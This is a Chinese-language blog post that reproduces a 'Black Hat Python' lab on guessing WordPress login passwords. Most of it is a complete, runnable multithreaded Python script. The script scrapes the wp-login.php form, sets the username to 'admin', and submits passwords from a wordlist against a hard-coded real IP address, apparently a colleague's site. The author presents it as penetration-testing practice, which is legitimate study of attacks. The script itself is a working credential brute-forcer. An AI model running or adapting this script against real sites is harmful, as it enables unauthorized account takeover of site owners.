天天看點
傳回

python滲透測試入門之wordpress登入

作者:ailx10
python滲透測試入門之wordpress登入

近期收到了電子工業出版社贈送的一本網絡安全書籍《python黑帽子》,書中一共24個實驗,今天複現第14個實驗(密碼猜測),我的測試環境是mbp電腦+同僚的wordpress站點+conda開發環境。有一說一,弱密碼是脆弱的,但是複雜密碼根本猜不出來,需要分析站點POST請求和響應是值得肯定的,但是等着耗着CPU和網絡是不可取的~

python滲透測試入門之wordpress登入

ailx10

網絡安全優秀回答者

網絡安全碩士

去咨詢

1、查閱wordpress站點登入頁面源代碼

  • 首先GET請求,接受傳回的所有cookie
  • 解析傳回頁面中的表單元素(觀察input标簽,log是使用者名、pwd是密碼、wp-submit是送出、testcookie是隐藏cookie)
  • 修改傳回頁面中的表單元素(将使用者名設定為“admin”,将密碼設定為字典中的每個元素,其他不變)
  • 送出POST請求
python滲透測試入門之wordpress登入

2、下載下傳字典檔案

python滲透測試入門之wordpress登入

3、在mbp上運作腳本

python滲透測試入門之wordpress登入

參考代碼:

# -*- coding: utf-8 -*-
# @Time    : 2022/6/13 9:47 PM
# @Author  : ailx10
# @File    : wordpress_killer.py

from io import BytesIO
from lxml import etree
from queue import Queue
import requests
import sys
import threading
import time

# SUCCESS = "Welcome to WordPress!"
SUCCESS = "歡迎"
TARGET = "http://124.223.4.212/wp-login.php"
WORDLIST = "/Users/ailx10/py3hack/chapter5/cain.txt"

def get_words():
    with open(WORDLIST) as f:
        raw_words = f.read()
        words = Queue()
        for word in raw_words.split():
            words.put(word)
    return words

def get_params(content):
    params = dict()
    parser = etree.HTMLParser()
    tree = etree.parse(BytesIO(content),parser=parser)
    for elem in tree.findall("//input"):
        name = elem.get("name")
        if name is not None:
            params[name] = elem.get("value",None)
    return params

class Bruter:
    def __init__(self,username,url):
        self.username = username
        self.url = url
        self.found = False
        print(f"\nBrute Force Attack beginning on {url}.\n")
        print("Finished the setup where username = %s\n"%username)

    def run_bruteforce(self,passwords):
        for _ in range(10):
            t = threading.Thread(target=self.web_bruter,args=(passwords,))
            t.start()

    def web_bruter(self,passwords):
        session = requests.Session()
        resp0 = session.get(self.url)
        params = get_params(resp0.content)
        params["log"] = self.username

        while not passwords.empty() and not self.found:
            time.sleep(1)
            passwd = passwords.get()
            print(f"Trying username/password {self.username}/{passwd:<10}")
            params["pwd"] = passwd

            resp1 = session.post(self.url,data=params)
            if SUCCESS in resp1.content.decode():
                self.found = True
                print(f"\nBruteforcing successful.")
                print("Username is %s"%self.username)
                print("Password is %s\n"%passwd)
                print("done.")

if __name__ == "__main__":
    words = get_words()
    b = Bruter("admin",TARGET)
    b.run_bruteforce(words)
python滲透測試入門之wordpress登入

釋出于 2022-06-13 22:23

測試
上一篇: 五一閑暇大充電 20部經典金融電影+豆瓣高分1-10部
下一篇: python滲透測試入門之人臉識别

繼續閱讀